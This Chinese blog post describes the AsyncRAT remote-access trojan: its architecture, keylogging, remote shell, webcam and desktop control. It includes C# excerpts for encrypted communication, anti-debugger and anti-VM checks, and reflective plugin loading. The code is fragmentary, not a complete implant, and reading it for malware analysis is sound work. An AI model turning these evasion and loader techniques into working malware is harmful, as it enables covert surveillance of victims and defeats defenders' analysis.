AsyncRAT远程控制工具分析

用户4682003

发布于 2025-06-16 09:04:46

4900

代码可运行

文章被收录于专栏：网络安全技术点滴分享网络安全技术点滴分享

运行总次数：0

代码可运行

系统功能概述

AsyncRAT 是一个功能强大的远程控制工具，主要用于远程管理和控制目标计算机。它支持多种功能，包括文件管理、远程桌面、进程管理、键盘记录、远程Shell、Webcam控制等。该工具通过加密通信和插件机制，能够灵活扩展功能，并且具备一定的反分析和反虚拟机检测能力。

系统架构

AsyncRAT 的架构分为客户端和服务器端两部分：

客户端：负责与服务器建立连接，执行服务器下发的指令，并将执行结果返回给服务器。客户端通过多线程和异步通信机制，确保高效的任务执行和响应。
服务器端：负责管理客户端，下发指令，并接收客户端的反馈。服务器端通过图形化界面（GUI）展示客户端的状态和信息，支持对多个客户端的管理。

核心技术点

加密通信：

使用AES-256加密算法对通信数据进行加密，确保数据传输的安全性。

通过X.509证书进行身份验证，防止中间人攻击。

核心加密代码：

     public class Aes256
     {
         private const int KeyLength = 32;
         private const int AuthKeyLength = 64;
         private readonly byte[] _key;
         private readonly byte[] _authKey;
         public Aes256(string masterKey)
         {
             using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(masterKey, Salt, 50000))
             {
                 _key = derive.GetBytes(KeyLength);
                 _authKey = derive.GetBytes(AuthKeyLength);
             }
         }
     }

反分析和反虚拟机检测：

通过检测调试器、虚拟机环境、磁盘大小等方式，防止在分析环境中运行。

核心代码：

public static void RunAntiAnalysis()
{
   if (DetectManufacturer() || DetectDebugger() || DetectSandboxie() || IsSmallDisk() || IsXP())
             Environment.FailFast(null);
 }

插件机制：

支持通过插件扩展功能，插件可以动态加载和执行。

核心代码：

public static void Invoke(MsgPack unpack_msgpack)
{
   Assembly assembly = AppDomain.CurrentDomain.Load(Zip.Decompress(SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString)));
   Type type = assembly.GetType("Plugin.Plugin");
   dynamic instance = Activator.CreateInstance(type);
   instance.Run(ClientSocket.TcpClient, Settings.ServerCertificate, Settings.Hwid, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), MutexControl.currentApp, Settings.MTX, Settings.BDOS, Settings.Install);
}

远程桌面和Webcam控制：

支持实时远程桌面控制和Webcam捕获，使用高效的图像压缩算法（如JPEG）减少带宽占用。

核心代码：

public override unsafe void CodeImage(IntPtr Scan0, Rectangle ScanArea, Size ImageSize, PixelFormat Format, Stream outStream)
     {
         byte* pScan0 = (byte*)Scan0.ToInt32();
         if (!outStream.CanWrite)
             throw new Exception("Must have access to Write in the Stream");
         int Stride = 0;
         int RawLength = 0;
         int PixelSize = 0;
         switch (Format)
         {
             case PixelFormat.Format24bppRgb:
                 Stride = ImageSize.Width * 3;
                 RawLength = Stride * ImageSize.Height;
                 PixelSize = 3;
                 break;
         }
     }